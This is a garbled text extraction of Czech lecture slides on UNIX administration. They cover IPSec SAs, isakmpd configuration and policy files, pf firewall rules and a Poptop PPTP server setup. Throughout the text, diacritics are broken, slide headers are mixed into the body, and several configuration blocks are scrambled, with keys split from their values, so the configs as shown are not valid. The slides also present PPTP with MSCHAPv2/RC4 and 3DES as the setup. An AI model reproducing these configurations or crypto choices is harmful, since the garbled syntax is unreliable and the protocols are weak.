ˇ Úspešná dohoda o zabezpeˇceném kanálu Vzniknou dveˇ IPSec SA: jedna pro vstupní a druhá pro odchozí tok s vlastními SPI. Nakonec tedy existují tˇri SA

IKE/ISAKMP


1

ISAKMP IKE SA: chrání (budoucí) Main mode a Quick mode

2

pˇríchozí IPSec SA: chrání data na vstupu od IPSec ˇ protejšku

3

odchozí IPSec SA: chrání data odesílaná IPSec ˇ protejšku

ˇ Záver

ISAKMP Quick mode implementace


ˇ minutách ticha na pˇríchozím IPSec SA se po peti vyˇcistí obeˇ IPSec SA ˇ reinicializace probehne Quick módem a vzniknou nové klíˇce i SPI expirace IPSec SA Quick módu je po jedné hodineˇ anebo 100MB toku ˇ minutách pˇred expirací pˇrenos v posledních peti spustí automatickou regeneraci inicializaci nového Quick módu spustí strana, která odbavila více dat nebo ta, která iniciovala pˇredchozí Quick mód



ˇ Záver

Administrace UNIXu

Prostˇredí

Leo Galamboš VPN PPTP IPSec SPD a SAD IKE/ISAKMP


Tunel

Internet

Road warrior

ˇ Záver

Spoleˇcné nastavení


/etc/sysctl.conf net.inet.esp.enable=1

Konfigurace IPSec ISAKMPD ˇ Firewall a smerování

net.inet.ah.enable=1 net.inet.ip.forwarding=1 /etc/rc.conf.local pf=YES isakmpd_flags=

PPTP

ˇ Záver

Nastavení isakmpd


Konfigurace IPSec

/etc/isakmpd/isakmpd.conf – základní konfigurace isakmpd(8) /etc/isakmpd/isakmpd.policy – bezpeˇcnostní ˇ klíˇcu˚ pravidla pro výmenu


ˇ Záver

/etc/isakmpd/isakmpd.policy


Konfigurace IPSec

Keynote-version: 2 Authorizer: "POLICY" Conditions: app_domain == "IPsec policy" && esp_present == "yes" && esp_enc_alg != "null" -> "true";


ˇ Záver

/etc/isakmpd/isakmpd.conf


[General] Listen-On= 192.168.1.A [Phase 1] 192.168.1.B= peer-B



[Phase 2] Connections= VPN-A-B


ˇ Záver

[peer-B] Phase= Address= Configuration= Authentication=

1 192.168.1.B Default-main-mode hesloAB

[VPN-A-B] Phase= ISAKMP-peer= Configuration= Local-ID= Remote-ID=

2 peer-B Default-quick-mode A-internal-network B-internal-network

/etc/isakmpd/isakmpd.conf


[A-internal-network] ID-type= IPV4_ADDR_SUBNET Network= 10.100.100.0 Netmask= 255.255.255.0

IKE/ISAKMP


[B-internal-network] ID-type= IPV4_ADDR_SUBNET Network= 10.0.100.0 Netmask= 255.255.255.0 [Default-main-mode] EXCHANGE_TYPE= ID_PROT Transforms= 3DES-SHA,BLF-SHA [Default-quick-mode] EXCHANGE_TYPE= QUICK_MODE Suites= QM-ESP-3DES-SHA-SUITE

PPTP

ˇ Záver

Zabezpeˇcení konfigurace



chown chmod chown chmod

root:wheel /etc/isakmpd/isakmpd.conf 0600 /etc/isakmpd/isakmpd.conf root:wheel /etc/isakmpd/isakmpd.policy 0600 /etc/isakmpd/isakmpd.policy


ˇ Záver

ˇ Nastavení firewallu a smerování


int_if="le1" ext_if="le2"


Konfigurace block log on { enc0, $ext_if } all

IPSec ISAKMPD

pass in proto esp from $GTW_B to $GTW_A pass out proto esp from $GTW_A to $GTW_B pass in on enc0 proto ipencap from $GTW_B to $GTW_A pass in on enc0 from $NET_B to $NET_A pass out on enc0 from $NET_A to $NET_B pass in on $ext_if proto udp from $GTW_B port = 500 to $GTW_A port = 500 pass out on $ext_if proto udp from $GTW_A port = 500 to $GTW_B port = 500

route add -net $NET_B $INNER_A


ˇ Záver

PPTP


Poptop

VPN PPTP

integrace pˇres RADIUS rozšíˇrení do Microsoft prostˇredí (LDAP, SAMBA) podpora Windows od 95 po XP, authetizace a kódování na bázi MSCHAPv2, MPPE 40-128 bit RC4



ˇ Záver

Pˇríprava kernelu s podporou GRE (Generic Routing Encapsulation) a tunX rozhraní pˇridání tunX rozhraní podle poˇctu uživatelu˚ instalace a konfigurace Poptop a PPP (PPTPD, PPPD) úprava pravidel firewallu

Kernel


pseudo-device gre

IKE/ISAKMP

Konfigurace IPSec

# odpovídá poˇ ctu pˇ ripojovaných uživatel˚ u pseudo-device tun 50


ˇ Záver

cd /dev sh ./MAKEDEV ‘seq -f "tun%.0f" 4 49‘

PPP


Konfigurace

/etc/pptpd.conf

IPSec ISAKMPD ˇ Firewall a smerování

option /etc/ppp/options localip $INNER_A_FREEIP remoteip $INNER_A_FREEBLOCK listen $GTW_A

PPTP

ˇ Záver

PPP


/etc/ppp/ppp.conf

Konfigurace IPSec

pptp: set timeout 0 set ifaddr $INNER_A_FREEIP $INNER_A_FREEBLOCK 255.255.255.255 enable pap enable chap enable MSChapV2 disable ipv6 enable proxy set dns $INNER_A_DNS set nbns $INNER_A_WINS


ˇ Záver

PPP


/etc/ppp/ppp.secret mask: 0400

VPN PPTP IPSec SPD a SAD

# static alloc username0 password0 staticip

IKE/ISAKMP


# dynamic alloc username1 password1 *

if [ -x /usr/local/sbin/pptpd ]; then echo -n " pptpd"; /usr/local/sbin/pptpd -d fi

PPTP

ˇ Záver

Nastavení firewallu



pass pass pass pass pass pass pass

in quick on $ext_if proto tcp from any to $ext_if port = 1723 modulate state Firewall a smerování ˇ in quick on $ext_if proto gre from any to $ext_if keep state PPTP out quick on $ext_if proto gre from $ext_if to any keep state ˇ Záver on tun0 all on tun1 all on tun2 all on tun3 all

The end



ˇ Záver

Leo Galamboš. Administrace UNIXu. Leo Galamboš

Recommend Documents